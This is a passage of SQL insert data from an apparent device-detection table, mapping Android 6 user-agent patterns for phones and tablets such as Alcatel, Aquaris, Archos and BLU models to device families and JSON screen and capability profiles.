(Linux; Android 6.*; Alcatel_5098O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Alcatel_7049D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Alumini3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Amazing A50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Andromax A26C4H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Andromax B26D2H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AntarcticE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Apollo Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Apollo X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aqua Ring) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aqua S9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris E5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris M10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_aquaris','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris U Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris X5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Aquaris_M4.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 101b Oxygen) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 50 Platinum 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 50 Saphir) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 50e Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 50f Helium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 55 Helium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 55 diamond Selfie) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Archos 60 Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Armor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Art Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Astro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Atlantic4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Azumi_IRO_A5_Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B BOT 50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B BOT 550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B1-780) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B3-A32) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B5032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; B5532) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BBA100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BBA100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BEAT 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BG2-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BGO-DL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLADE A602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLADE L7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLADE V7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLL-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLL-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLL-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLN-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLN-L24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU ADVANCE 4.0 L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU DASH L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU DASH M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU DASH X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU ENERGY DIAMOND) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU ENERGY M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU ENERGY X PLUS 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU GRAND 5.5 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU NEO X MINI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU R1 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU STUDIO G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU STUDIO G2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU STUDIO SELFIE 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BLU Studio Touch) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQ-4526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQ-5022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQ-5032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQ-5071) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQ-6050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQS-5020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQS-5050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQS-5060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQS-5070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQS-5520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BQru-4028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BRAVIS S500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BRAVIS X500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BTV-DL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BV5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BV6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BV6000S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; BV7000 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 